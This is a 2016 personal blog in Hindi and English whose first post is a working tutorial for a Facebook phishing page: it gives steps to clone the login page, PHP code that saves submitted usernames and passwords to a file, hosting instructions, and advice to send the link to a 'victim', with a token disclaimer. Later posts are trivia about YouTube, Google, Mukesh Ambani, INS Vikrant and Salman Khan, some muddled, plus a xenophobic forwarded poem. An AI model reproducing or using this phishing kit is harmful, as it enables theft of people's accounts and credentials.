रविवार, 11 सितंबर 2016

फेसबुक हैकिंग करने के कुछ नायाब तरीके


Hello Friends Myself Abhishek Singh and Today I gonna teach you to
How to hack Facebook with phishing page




As we all want to hack our friend facebook account,and want to read all his personal things.

* What is phishing?
-> Phishing is attempting to acquire information (and sometimes, indirectly, money) such as usernames, passwords, and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mailspoofing or instant messaging,and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents includelegislation, user training, public awareness, and technical security measures.
Today we create a facebook phishing page which look similar to a facebook page but it's not actually a facebook page,when victim enter his username and password you will be able to see that.Interesting.....

FACEBOOK PHISHING....

steps to create a phishing page:
1.Go to the Facebook page ,and then right click on the page, u will see the option view source page,click on that.

2.now a new tab will open which contain a source code,Select all the stuff and paste it in a notepad.
3.Now open the notepad and press CTRL+F,and type ACTION.


4.You will have to find a text which looks like ..
action="https://www.facebook.com/login.php?login_attempt=1"
5.delete all the text written in red colour and instead of it write post.php.then it will look like...
                    action="post.php"
6.Now save it on your desktop with the name index.htm,not index.html,remember.
7.Now your phishing page is ready.it will look like a pic given below .
 index
8.Open a new notepad and save the given data with the name post.php.
<?php header ('Location:http://www.facebook.com/');
$handle = fopen("usernames.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
9.You have two files now one is index.htm and another is post.php,remember file extension is important.
10.Now u have to upload it in a web hosting site ,i prefer u to use www.000webhost.com or else www.,my3gb.com.
11.I prefer u to use 000webhost because it will be easy to use.


12.You have to make a account in that ,after that it looks like a picture given below.


13.Now go control pannel,then on file manager.
14.After that a new window will pop up.Now go to public_html.



15.Delete the file named default.php,after that upload two files index.htm and post.php one by        one .


16.Now the last step click on view of index.htm it will look same as facebook page.
 this is your Facebook phishing page
17.Copy the url of that page and send this link to your victim,when your victim try to login in to it with the username and password .the page redirectly connect to facebook. and you will be now able to see his password.
18.Open your 000webhost account and go to file manager then public_html,here you find a new file named username.txt.


19.Click on view now u will have your friend's password and email id.


20.This is a simple trick to hack any Facebook password account by phishing page.
21.If you are not able to create a phishing page then i will provide u a video tutorial link,look
      in to the description of that video u will find a prepared module of phishing pages,download
      it and enjoy.
       click here to view a video tutorial with the readymade phishing pages....
note: phishing is a illegal activity so don't try on anyone.this tutorial is for educational purpose.
Not only Facebook u can make any phishing page of any website by following these steps....
u can hack Gmail,Yahoo,Orkut,Twitter and many more.....
                         Thanks
www.missiondunia.blogspot.com
 

यू ट्यूब के बारे में कुछ मजेदार तथ्य


01. कीबोर्ड शॉर्टकट्स
आप अपने कीबोर्ड की मदद से YouTube पर वीडियो देख सकते हैं. कुछ शॉर्टकट हैं जो आपके बहुत काम आएंगे.
K- ये चलते हुए वीडियो को रोक देगा
J- इससे आपका वीडियो 10 सेकंड तक रिवाइंड हो जायेगा
L- इससे आपका वीडियो 10 सेकंड तक फॉरवर्ड हो जायेगा
M- वीडियो की आवाज़ बंद करने के लिए 'M' दबाएं
Shift+N- इससे आपकी प्लेलिस्ट का अगला वीडियो शुरू हो जायेगा
Shift+P- इससे आप अपनी प्लेलिस्ट का पिछला वीडियो देख सकते हैं
02. Use The Force Luke ये बड़ा ही मज़ेदार है. अगर आप YouTube के सर्च बार में' Use The  Force Luke'लिखेंगे तो आपकी स्क्रीन अपने आप दायें-बाएं घूमने लगेगी. आपको ऐसा लगेगा कि आपके पास कोई शक्ति आ गयी है जिससे ऐसा हो रहा है.
03. Do The Harlem Shake 2013 में हार्लेम शेक ने इंटरनेट की दुनिया में तहलका मचा दिया था. अगर आप YouTube के सर्च बार में' Do The Harlem Shake'लिखेंगे तो आपकी स्क्रीन अपने आप नाचने लग लग जाएगी.
04. Doge Meme YouTube को रंग-बिरंगा बनाने के लिए आप सर्च बार में लिखें' Doge  Meme'. फिर देखिये कि आपका
YouTube कैसे तब्दील हो जाता है.
05. लीनबैक YouTube को और भी कूल बनाना है तो अपने वेब ब्राउज़र पर www.youtube.com/leanback लिखें और फिर कमाल देखें.
06. आसानी से YouTube वीडियो डाउनलोड करें कई वीडिओज़ को आप अपने कंप्यूटर पर सेव कर के रखना चाहेंगे. ये करना बहुत ही आसान है. वीडियो के लिंक के आगे'ss'लगा दें. जैसे https://www.ssyoutube.com/watch?v=8z0-ngjFxhk. ये आपको एक दूसरी वेबसाइट पर ले जाएगा जहां से आप बहुत ही आसानी से वीडियो अलग-अलग क्वालिटी में डाउनलोड कर सकते हैं.
07. किसी भी वीडियो से GIF बनायें
अब आप चुटकियों में मज़ेदार GIF बना सकते हैं. वीडियो के YouTube लिंक के आगे'gifyoutube'लगा दें. जैसे https://www.gifyoutube.com/watch?v=8z0-ngjFxhk. इससे आसानी से किसी भी वीडियो का GIF इमेज बन जायेगा.
08. YouTube के नए फीचर्स टेस्ट करें
YouTube अपने फीचर्स में कई बदलाव करता रहता है. कई नए एक्सपेरिमेंट्स भी YouTube पर होते हैं. अगर आप इन बदलावों को टेस्ट करना चाहते हैं तो टाइप करें www.youtube.com/testtube.
09. वीडियो में चल रहे गानों का नाम पता करें
कई बार होता है कि YouTube पर वीडियो देखते समय बैकग्राउंड में कोई ऐसा गाना बज रहा होता है, जो आपको पसंद तो बहुत आता है, लेकिन उसका नाम नहीं पता होता. इसका सिंपल सा उपाय है. www.mooma.sh पर लॉगिन करें और वीडियो का लिंक उस पर पेस्ट करें. जितने भी गाने उस वीडियो में बज रहे हैं, उनकी लिस्ट आपको मिल जाएगी.
10. फ्लोटिंग YouTube प्लेयर बनायें
आमतौर पर हम YouTube अपने वेब ब्राउज़र पर देखते हैं, लेकिन अगर आप चाहते हैं कि एक पोर्टेबल YouTube प्लेयर आपकी स्क्रीन पर आ जाए तो गूगल क्रोम का फ्लोटिंग  YouTube प्लेयर एक्सटेंशनडाउनलोड करना पड़ेगा. ये प्लेयर आपके वीडियो की साइज़ का होगा जिसे आप अपनी स्क्रीन के किसी भी कोने पर रख सकते हैं. आराम से काम करें और जब बोर हो जाएं तो वीडियो देखें.
तो ये YouTube ट्रिक्स ज़रूर उपयोग कीजियेगा. कमेंट कर के अपने अनुभव शेयर करना मत भूलना. इस आर्टिकल को ज़्यादा से ज़्यादा लोगों से साथ शेयर करें.
                         www.missiondunia1.blogspot.com
       अगर आपको हमारी वेबसाईट अच्छी    
      लगती है तो BOOKMARK कर लो क्योकिं
      हम आगे और पोस्ट करेंगे। धन्यवाद।
         आपका दोस्त -- अभिषेक सिंह

गूगल के बारे में कुछ अनजानी बातें जो आप शायद नहीं जानते होंगे

Google ने आज हमारी ज़िन्दगी कितनी आसान बना दी है, यह सिर्फ हम ही बता सकते हैं. किसी नयी जगह जाना हो, तो ‘Google Map’ देख कर पहुंच जाते हैं. किसी शब्द का मतलब ना पता हो, तो भी Google बैठा है बताने के लिए. आसपास के किसी रेस्टोरेंट के बारे में जानकारी लेनी हो, तब भी Google करते हैं हम. सही कहें तो हम गूगल के इतने आदी हो गये हैं कि उसके बिना हम रह नहीं पायेंगे.
गूगल पर हमारी इतनी निर्भरता होने के बावजूद भी कुछ ऐसी चीज़ें हैं, जो ज़्यादातर लोग नहीं जानते थे. आज हम बतायेंगे ऐसी 10 Unusual चीज़ों के बारे में, जो Google की मदद से आप कर सकते हैं.
1. Timer Set कर सकते हैं
हां! सही सुना आपने. Laptop पर काम करते हुए कभी आपका फ़ोन पास में न हो, तो यह Timer बहुत काम आ सकता है. आपको सिर्फ गूगल पर जाकर ‘Set a timer for’ लिख कर उसके आगे समय लिखना है. आपके क्लिक करते ही टाइमर शुरू हो जाएगा.
2. Currency को बदल सकते हो
गूगल पर ‘Currency Coverter’ टाइप करो और जान लो कि आपके रुपयों को डॉलर,पाउंड, यूरो या किसी और देश की मुद्रा में बदलेंगे तो कितने बनेंगे.
3. आपके खाने में कितनी Calories हैं, ये जान सकते हो पिज़्ज़ा खाने से पहले जानना हो कि इसमें कितनी Calories हैं, तो गूगल पर जाइये और खाने का नाम और वज़न लिख दीजिए. बस आपको पता लग जाएगा कि आपके अन्दर जो जाने वाला है, वह अच्छा भी है या नहीं.
4. किसी भी भाषा का अनुवाद घर बैठे कोई भाषा जाननी हो, तो गूगल से बड़ा टीचर कोई नहीं. सीख न भी पाए तो कम से कम Copy and Paste कर के दूर देश बैठी अपनी Facebook वाली दोस्त से उसकी भाषा में बात कर पाओगे.
5. किसी भी Air Flight की जानकारी ले
सकते हो कोई दोस्त आपसे मिलने Plane में आ रहा है. आप उसे बिन बताये उसे लेने जाना चाहते हैं. लेकिन उसकी Flight की टाइमिंग भी ठीक से नहीं पता, और इंतज़ार भी नहीं करना चाहते. अब क्या? गूगल बाबा हैं ना! बस उस फ्लाइट का नाम ड़ालो, गूगल चाचा बता देंगे कि वह अभी  कहां है और कितनी देर में अपने
गंतव्य पर पहुंचेगी.
6. पुराने समय के Internet को फिर से Experience कर सकते हैं 1990 के दशक के Internet अनुभव को फिर से देखने के लिए गूगल कीजिए “Google in 1998”. और इसके बाद अगर आप उस दौर की इंटरनेट दुनिया को जानते हो , तो आपकी पुरानी यादें ताज़ा हो जायेंगी.
7. Instantly गेम खेल सकते हो
गूगल पर टाइप करो ‘Zerg Rush’ फिर देखो करिश्मा. इस खेल में High score छोड़ो, अगर खाता भी खोल पाए तो बताना
8. Guitar बजा सकते हो सही सुना आपने. गूगल भी जानता है कि लोग आजकल गिटार बजाने में कितनी दिलचस्पी रखते हैं. इसलिए वह दे रहा है, एक ऐसी सुविधा जहां आप अपने माउस से गिटार की तार  पर हाथ आज़मा सकते हैं।
               
       अगर आपको हमारी वेबसाईट अच्छी    
      लगती है तो BOOKMARK कर लो क्योकिं
      हम आगे और पोस्ट करेंगे। धन्यवाद।
         आपका दोस्त -- अभिषेक सिंह

शनिवार, 10 सितंबर 2016

भारत के सबसे अमीर और रिलायंस के मालिक मुकेश अंबानी के बारे मे रोचक तथ्य


1.मुकेश अंबानी का जन्म 19 अप्रैल 1957 में यमन में हुआ।
2.फ़ोर्ब्स सूची के अनुसार अगस्त 2016 में लगभग 22.2 अरब डॉलर की निजी सम्पत्ती के साथ दुनिया के छत्तीसवें और भारत के पहले सबसे अमीर आदमी हैं।
3. वे रिलायंस इंडस्ट्रीज  के अध्यक्ष, प्रबंध निदेशक और कंपनी के सबसे बडे
शेयर धारक हैं।
4. रिलायंस इंडस्ट्रीज में उनकी व्यक्तिगत हिस्सेदारी 48 % है। उनकी संपत्ति का मूल्य (फोर्ब्स के अनुसार) 22.2 अरब अमेरिकी डॉलर है, जिस से वे भारत के सबसे अमीर आदमी साबित होते हैं।
5.मुकेश और उनके छोटे भाई अनिल  रिलायंस इंडस्ट्रीज के संस्थापक स्वर्गीय धीरू भाई अम्बानी  के बेटे हैं। मुकेश इंडियन प्रीमियर लीग की टीम मुंबई इंडियंस  के मालिक भी हैं।
6.मुकेश अम्बानी की स्कूली शिक्षा अबाय मोरिस्चा स्कूल  मुंबई में हुई तथा कैमिकल इंजीनियरिंग में स्नातक की डिग्री  उन्होंने UDCT से प्राप्त की, बाद में मुकेश
एमबीए  करने स्टैनफोर्ड विश्वविद्यालय  गए किन्तु पहले वर्ष के बाद ही उन्होंने पढ़ाई छोड़ दी.
7.मुकेश अम्बानी ने 1981 में रिलायंस में काम संभाला और रिलायंस के पुराने ढर्रे के टेक्सटाइल कारोबार को पॉलिएस्टर फाइबर और फिर पेट्रोकेमिकल में आगे बढाया. इस प्रक्रिया में उन्होंने 60 नयी, विश्व स्तर की, विभिन्न तकनीकों से युक्त निर्माण सुविधाओं की रचना को निर्देशित किया,

8.इस से रिलायंस की जो उत्पादन क्षमता 10 लाख टन प्रति वर्ष भी नही थी वह 1 करोड़ 20 लाख टन प्रतिवर्ष हो गयी।

9.मुकेश अम्बानी ने भारत की सबसे बड़ी दूरसंचार कंपनियों में से एक रिलायंस कम्युनिकेशंस (पूर्व में रिलायंस इंफोकॉम) लिमिटेड को स्थापित किया।
10. हालांकि, दोनों भाइयों में अलगाव होने के बाद रिलायंस इंफोकॉम अनिल धीरूभाई अंबानी समूह में चली गयी। अगर दोनों भाई अलग नही हुए होते और मुकेश प्रेजिडेंट बने रहते तो उनकी कुल संपती 85 बिलियन डॉलर होती और वे धरती पर सबसे ज़्यादा अमीर आदमी होते, वह भी एक बड़े अन्तर से.
11.अम्बानी इंडियन प्रीमियर लीग  की टीम मुंबई इंडियंस के मालिक हैं, जो 2013 में फाईनल में पहुँच पायी. इन्होने मुंबई में धीरू भाई अम्बानी इन्टरनेशनल स्कूल की स्थापना भी की है।
12.मुकेश अम्बानी की पत्नी नीता अम्बानी रिलायंस इंडस्ट्रीज के सामाजिक एवं धर्मार्थ कार्यो को देखती हैं। उनके तीन बच्चे हैं: आकाश, ईशा और अनंत.

13.मुकेश अम्बानी इस वक्त दुनिया का सबसे महंगा घर बनवा रहे हैं। इसकी कीमत 2 अरब डॉलर है।
14.एन डी टी वी द्वारा कराये गए सार्वजनिक चुनाव में साल 2007 के बिज़नसमैंन ऑफ़ द ईयर चुने गए।
15.यूनाईटेड स्टेटस-इंडिया बिज़नस कौंसिल (USIBC) ने वाशिंगटन में 2007 में "ग्लोबल विज़न" के लिए लीडरशिप अवार्ड दिया.
16.टोटल टेलिकॉम ने अक्टूबर, 2004 में दूरसंचार के क्षेत्र में सबसे प्रभावशाली व्यक्ति के तौर पर वर्ल्ड कम्युनिकेशन अवार्ड दिया गया।
        तो दोस्तो कैसी रही जानकारी कमेंट में
                जरुर बताना।
      अगर आपको हमारी वेबसाईट अच्छी    
      लगती है तो BOOKMARK कर लो क्योकिं
      हम आगे और पोस्ट करेंगे। धन्यवाद।
         आपका दोस्त -- अभिषेक सिंह

शुक्रवार, 9 सितंबर 2016

भारतीय नौसेना पोत विक्रांत के बारे में रोचक तथ्य

1.भारतीय नौसेना पोत विक्रांत भारतीय नौसेना का एक सेवा निवृत युद्ध पोत है। यह भारतीय नौसेना का प्रथम वायुयान वाहक पोत है। इस पोत को 1957 में ब्रिटेन से खरीदा गया था। तब तक इसे एचएमएस हर्क्युलिस के नाम से जाना जाता था। 1961 में इसे भारतीय नौसेना शामिल किया गया तथा 31 जनवरी 1997 को काम से हटा लिया गया।
2.यह भारत का पहला स्‍वदेशी विमान वाहक (आईएसी - इन्डिजनस एयरक्राफ्ट कैरियर) पोत है।
3.इस जहाज की लम्‍बाई लगभग 260 मीटर और इसकी अधिकतम चौड़ाई 60 मीटर है।

4.अगस्त 2013 में भारत सरकार द्वारा जारी विज्ञप्ति के अनुसार इसका बड़े पैमाने पर नवीकरण किया जा रहा था। पुनर्निर्माण का प्रथम चरण पूरा होने के बाद 12 अगस्त 2013 को इसे नये अवतार में उतारा गया। विमान को उड़ान भरने में मदद के लिए इसमें 37,500 टन का रैम्‍प लगाया गया।
5.दूसरे चरण में जहाज के बाहरी हिस्‍से की फिटिंग, विभिन्‍न हथियारों और सेंसरों की फिटिंग, विशाल इंजन प्रणाली को जोड़ने और विमान को उसके साथ जोड़ने का काम पूरा किया गया, जिसे 10 जून 2015 को जलावतरित किया गया| व्यापक परीक्षणों के पश्चात् वर्ष 2017-18 के आसपास भारतीय नौसेना को सौंपने की योजना है।


6.अप्रैल २०१४ में सरकार द्वारा इस पोत को कबाड़ में बेचने का निर्णय ले लिया गया। एक नीलामी के जरिए इस पोत को 60 करोड़ रुपये में एक प्राइवेट कंपनी आईबी कमर्शल प्राइवेट लिमिटेड को बेच दिया गया। इस निर्णय का काफी विरोध हुआ। पूर्व नौसेना प्रमुख एडमिरल अरुण प्रकाश ने इस फैसले पर खेद व्यक्त करते हुए इस ऐतिहासिक युद्धपोत को युद्ध संग्रहालय में बदलने की वकालत की।
7.देश में पहली स्वदेशी परमाणु पनडुब्बी आईएनएस अरिहंत बनाने के बाद अब भारतीय नेवी को और मजबूत करने के लिए आईएनएस विक्रांत आ गया है। देश में बने पहले विमानवाहक पोत आईएनएस विक्रांत को आज कोच्चि के समंदर में उतार दिया गया। आज रक्षा मंत्री एके एंटनी की मौजूदगी में इसे समंदर में उतारा गया। इस मौके पर एंटनी ने कहा कि आईएनएस विक्रांत तुरंत कार्रवाई के लिए सक्षम है।
8.नेवी में विक्रांत के शामिल होने के बाद भारत अमेरिका, ब्रिटेन, रूस और फ्रांस की उस लीग में शामिल हो गया है जिनके पास इस क्षमता के युद्ध पोत हैं। इसी ताकत की बदौलत सुपरपॉवर अमेरिका ने दुनिया पर दबदबा कायम रखा है। ये अमेरिकी विमान वाहक पोतों का बेड़ा है। ऐसे विशालकाय युद्धपोत जिनपर छोटी-मोटी वायुसेना और थलसेना का पूरा लावलश्कर होता है। इन्हीं की बदौलत अमेरिका इराक से लेकर अफगानिस्तान तक आतंक के खिलाफ जंग जारी रख पाया। खुद को सुपरपॉवर साबित कर सका।

9.आईएनएस विक्रांत, भारत का पहला स्वदेशी विमान वाहक पोत है। कोची शिपयार्ड में तैयार हो रहे विक्रांत को आज लॉन्च कर दिया गया। इसके साथ ही अमेरिका, रूस, ब्रिटेन और फ्रांस के बाद 40 हजार टन का विमानवाहक पोत बनाने की क्षमता वाला भारत दुनिया का पांचवा देश हो गया। हालांकि पहला स्वदेशी विमानवाहक पोत 2018 में नौ सेना में पूरी तरह से शामिल हो जाएगा।


10. आईएनएस विक्रांत की तरह ही स्वदेशी विमानवाहक पोत आईएनएस विक्रांत भी जबरदस्त ताकत वाला होगा। आईएनएस विक्रांत करीब 260 मीटर लंबा होगा, यानी समंदर में तैरता एक छोटामोटा शहर। करीब 40 हजार टन भार वाला विक्रांत 18 नॉट की रफ्तार से एक बार में 7,500 नॉटिकल मील की दूरी तय कर लेगा। इसका सबसे खतरनाक हथियार रूस में बना मिग-29 होगा।


11.विक्रांत के डेक पर करीब 25 से 30 लड़ाकू विमानों को बेड़ा तैनात रहेगा, जिनमें करीब 12 मिग-29के, देश में बने 8 तेजस विमान और 10 एंटी-सबमरीन हेलीकॉप्टर होंगे। ये हेलीकॉप्टर अर्लीवॉर्निंग सिस्टम से लैस होंगे, जिससे दुश्मन की कोई भी पनडुब्बी विक्रांत के पास फटक नहीं पाएगी। विक्रांत पर इन हवाबाजों की परवाज के लिए दो रनवे भी होंगे। इसके साथ ही दुश्मन के लड़ाकू विमानों को हवा में गिराने के लिए विक्रांत पर आधुनिक रडार, क्लोज इन वेपन सिस्टम और कई किस्म की मिसाइलों के साथ जमीन से हवा में लंबी दूरी तक मार करने वाली मिसाइलें भी होंगी।



12. फिलहाल भारत के पास सिर्फ एक विमानवाहक पोत आईएनएस विराट ही है, जो 2018 तक नौसेना के बेड़े में रहेगा। रूस से खरीदा गया एडमिरल गोर्शकोव यानी आईएनएस विक्रमादित्य के 2013 के अंत तक नौ सेना में शामिल होने की उम्मीद है। यानी आईएनएस विक्रांत के आने के बाद भारतीय नौसेना दो कैरियर बैटल ग्रुप वाली समुद्री ताकत बन गई है।
13. आईएनएस विक्रांत भारत का पहला विमान वाहक पोत था.
14. भारत ने इसे ब्रिटेन के रॉयल नेवी से साल 1957 में खरीदा था.
15. एचएमएस हरक्यूलस के नाम से जाने जाने वाले आईएनएस विक्रांत को रॉयल नेवी ने दूसरे विश्व युद्ध के दौरान तैयार किया था.
16. मैजेस्टिक श्रेणी के इस विमान वाहक पोत को 1961 में नौसेना में शामिल किया गया था और जनवरी 1997 में ये कहते हुए इसकी सेवा समाप्त कर दी गई कि पोत का रख-रखाव संभव नहीं है.
 
17. आईएनएस विक्रांत ने साल 1965 और 1971 के भारत-पाक युद्ध में पाकिस्तान की नौसेना के लिए बड़ी मुसीबत था.
18. 1965 के भारत-पाक युद्ध में पाकिस्तान ने कहा था कि उसने विक्रांत को डूबो दिया है जबकि वह मुंबई के नौसेना की पोतगाह में वह कुछ तब्दीलियों से गुजर रहा था.
19. साल 1971 में हुए युद्ध के दौरान आईएनएस विक्रांत ने पाकिस्तान की नौसैनिक घेरेबंदी में अहम भूमिका निभाई थी.
20. बांगलादेश को आज़ाद करने का अभियान में महत्वपूर्ण भूमिका के कारण इससे जुड़े अधिकारियों को दो महावीर चक्र और 12 वीर चक्र मिले.
21. कई दिग्गज नौसैनिकों और वायुयान चालकों ने इस पोत पर प्रशिक्षण पाया. पूर्व नौसैनिक प्रमुख एडमिरल आरएच तहिलयानी पोत के डेक पर हवाईजहाज उतारने वाले पहले भारतीय थे.
22. शिप ब्रेकिंग कंपनी आईबी कमर्शियल्स के मुताबिक 36 साल भारत की सेवा करने वाले इस विमानवाहक पोत को तोड़ने में 7-8 महीने लगेंगे.
      दोस्तो तो बताओ कैसी लगी जानकारी
      अगर आपको हमारी वेबसाईट अच्छी    
      लगती है तो BOOKMARK कर लो क्योकिं
      हम आगे और पोस्ट करेंगे। धन्यवाद।
         आपका दोस्त -- अभिषेक सिंह

यही सच्चाई है।

💥👌एक बार,"3 लोग"बैठ के बातें कर रहे थे  !!और बड़ी जोर जोर से, हंस रहे थे !!!उन में से -एक किसी "मीडिया चैनल" का,"मालिक" था !! एक,"विदेशी"था,एक,"नेता" था !!!

👌सब से पहले,"विदेशी"बोला :-----
👌"यहाँ के लोग"तो,"मुर्ख"हैं,हमारा "कूड़ा'"खाते हैं।!!
👌हमारे,"कुत्तो"की"साबुन"से,"नहाते"हैं !!!!!!!!!!
👌हमारे बनाये,"कीटनाशक"को, "अमृत समझ"के,"पीते" हैं।!!
👌इनकी ही,"गौ माता"को,"मार कर", हम
"मैग्गी",लेज,और"सभी सामानों"में, "मिलाते" हैं।!!
👌ये,"मुर्ख"ब्रांडेड"समझ के,"मजे से खा"जाते हैं।!!
👌"नीम की दातुन"को,"छुङवा"के, लगा दिया,"कोलगेट"घिसने पे।!!
👌जो बनती है,"जानवरों"की,"हड्डी पिसने" पे।!!!
👌"दीवाली"जैसे,"त्यौहारों"पे भी,
अब ये,,हमारी"चोकलेट" -"कुरकुरे" खाते हैं !!!
👌और अपनी" गौ माता" के" दूध"में, "मिलावट" बताते हैं।
👌"हम"यहाँ बैठ कर,इनको, अपने इशारे पे,"नचवाते"हैं।
👌"राम सेतु"आदि यहाँ बैठ के, "तुड्वाते" हैं।
👌यह थे,कभी"दुनिया के मालिक", आज,"नौकर" इनको बना दिया।!!
👌"आसमान" से पटक कर, "मिट्टी" में इनको,"मिला" दिया!!।
👌पर,"अक्ल"इन"मूर्खो"को,अभी भी, नहीं आई !!!!
👌आज भी,"ब्रांडेड'से"नहाते" हैं!!! "ब्रांडेड"खाते हैं।!!
👌"ब्रांडेड" चलाते हैं !!" ब्रांडेड" पहनते हैं !!!!
😀😀😀हा हा हा हा हा😀😀
👌पूरे कमरे में गूंज रही,"ठहाको"की "फुलवारी"थी।
👌अब - "विदेशी" के बाद," नेता" की बारी थी।!!
👌"दारु का गिलास"उठा के,"नेता" बोला :-----
👌अरे,"विदेशी भाई"तुमने,"हमको" "कम तोला"।!!!
👌ये लोग,"तुम्हारे गुलाम"न होते.......
👌"हम",अगर"आपके साथ"न होते।????
👌हमने,"सोने की चिड़िया"को, "रुलाया" है।!!
👌यहाँ का राज,"हमने"ही,"तुम्हे" "दिलाया" है।!!!
👌"तुमने"तो सिर्फ," पैसा और सामान "दिया है।!!
👌"असली पागल" तो," इनको "हमने", किया है।!!
👌कभी - "जात"के नाम पे ,कभी -  "धर्म" के नाम पे ........
👌हमने - "भाई भाई"को,"लड़ाया "है।!!!
👌हम," देश को निचोड़"के,"बेच" देंगे,तुम"इत्मीनान" रखना।!!!
👌बस ----- "पैसा"कम न हो जाये, "मेरे स्विस खाते" का,"ख्याल" रखना।!!!
👌इसी बीच,"मीडिया वाला", चिल्लाया -----" तोड़ दारु की बोतल", जोर से,"बङबङाया"!!!!!
👌"तुम दोनों","कुछ भी न होते",
"हम" अगर," आपके साथ" न होते ????
👌"तुम्हारी हर नीच हरकत","हम छुपाते" हैं।!!!
👌पकड़ के,"किसी बेकसूर" को, "ज़ालिम ज़ालिम" चिल्लाते" हैं।!!
👌"ब्रांडेड"आपके इसलिए"बिकते" हैं ----' क्यूँ की,"हर ब्रेक" में हमारे, "दिखते" हैं।
👌"विदेशी सामान"का,"असली सच" हम,"दिखाते नहीं "हैं।!!!
👌इसलिए - "अच्छे स्वदेशी प्रोडक्ट" "टिक पाते"नहीं हैं।!!!

👌"अच्छे भले लोगों"को,हम - "फंसा" रहे हैं।!!
👌इसलिए - "आप सबको मुर्ख"बना रहे हैं।!!
👌"हर चैनल"...."हर एंकर".
"बिकता" है ।!!!!
👌इसलिए - " सुबह 6 बजे"हर जगह," विदेशी प्रोडक्ट" दिखता है।!!
This is edited by Abhishek Singh 5114
👌अगर," सिर्फ,24 घंटे"हम, "ईमांनदारी"से,"खबरें"चला दें.......
👌"तुम दोनों"को,"एक दिन"में,"जेल" भिजवा दें !!!!!!
👍🙏​​अगर,आप - "सच्चे भारतीय" होंगे तो,इस "पोस्ट"को," ज्यादा से ज्यादा"लाइक और शेयर "करें
 
आप लोगो से मेरी यह गुजारिश है कि कृप्या विदेशी वस्तुओं का कम से कम उपयोग करें।
              आपका शुभचिंतक
                अभिषेक सिंह

सलमान खान के बारे में रोचक तथ्य


1.सलमान खान का पूरा नाम अब्दुल रशीद सलीम सलमान खान है।
2.उनका जन्म 27 दिसम्बर 1965 को इन्दौर, मध्य प्रदेश, भारत में हुआ।
3.इन्होंने अभिनय की दुनिया में अपनी पहली फिल्म बीवी हो तो ऐसी से शुरूआत की।
4.सलमान को अपनी पहली बड़ी व्यावसायिक सफलता 1989 में रिलीज़ हुई मैंने प्यार किया से मिली, जिसके लिए इन्हें फिल्मफ़ेयर सर्वश्रेष्ठ नवीन पुरूष अभिनेता पुरस्कार भी दिया गया
5.सलमान खान कथानककार सलीम ख़ान और उनकी पहली पत्नी (प्रथम नाम सुशीला चरक) सलमा के ज्येष्ठ पुत्र है।
6.उनके दादा अफगानिस्तान से आकार भारत में मध्य प्रदेश में बस गए थे। उनकी माँ मराठी हिंदू है, सलमान खान ने एक दफ़ा खुद भी कहा है की वे आधे हिंदू व आधे मुस्लिम है।
7.उसकी सौतेली माँ हेलेन, एक पूर्व बॉलीवुड अभिनेत्री है जिन्होंने उनके साथ कुछ फ़िल्मों में साथ काम किया था। उनके दो भाई अरबाज़ ख़ान और शोहेल ख़ान है व बहनें अलवीरा और अर्पिता है।
8.वर्ष 2008 में खान ने अपनी गेम शो दस का दम के साथ छोटे परदे पर उतरे जो अंतरराष्ट्रीय शो पॉवर ऑफ़ टेन  पर आधारित था।
9. सलमान खान एक समर्पित बॉडीबिल्डर हैं। वे प्रतिदिन मेहनत करते हैं और मूवी तथा स्टेज शो में अपनी कमीज उतारने के लिए प्रसिद्ध हैं।
9.अमेरिका की पीपुल पत्रिका द्वारा वर्ष 2004 में इन्हें दुनिया का 7वां सबसे सुंदर पुरूष और भारत के सबसे सुंदर पुरूष का खिताब मिला।
10.   15 जनवरी 2008 को लंदन के मैडम तुसाद संग्रहालय में खान की आदमकद मोम की प्रतिमा स्थापित की गई और इस प्रकार संग्रहालय में मोम की प्रतिमा के रूप में दिखाई देने वाले वे चौथे भारतीय अभिनेता बन गए।
11.  28 सितम्बर 2002, को लापरवाही से गाड़ी चलाने के लिए गिरफ्तार किया गया। उनकी कार के मुम्बई में एक बेकरी से टकरा जाने से सड़क की पगडण्डी पर सो रहा एक व्यक्ति मारा गया और अन्य तीन इस दुर्घटना में घायल हो गए।
12.17 फरवरी, 2006 को खतरे में पड़ी एक वन्य जाति चिंकारा का शिकार करने के लिए एक वर्ष की जेल भी हुई थी। उच्च अदालत में अपील के दौरान सजा पर रोक लगा दी गई थी। 06 मई 2015 को उन्हें न्यायालय ने हिट एंड रन केस में दोषी मानते हुए 5 वर्ष की सजा सुनाई ।
13. 17 फरवरी, 2006 को खतरे में पड़ी एक वन्य जाति चिंकारा का शिकार करने के लिए एक वर्ष की जेल भी हुई थी। उच्च अदालत में अपील के दौरानसजा पर रोक लगा दी गई थी। 06 मई 2015 को उन्हें न्यायालय ने हिट एंड रन केस में दोषी मानते हुए 5 वर्ष की सजा सुनाई ।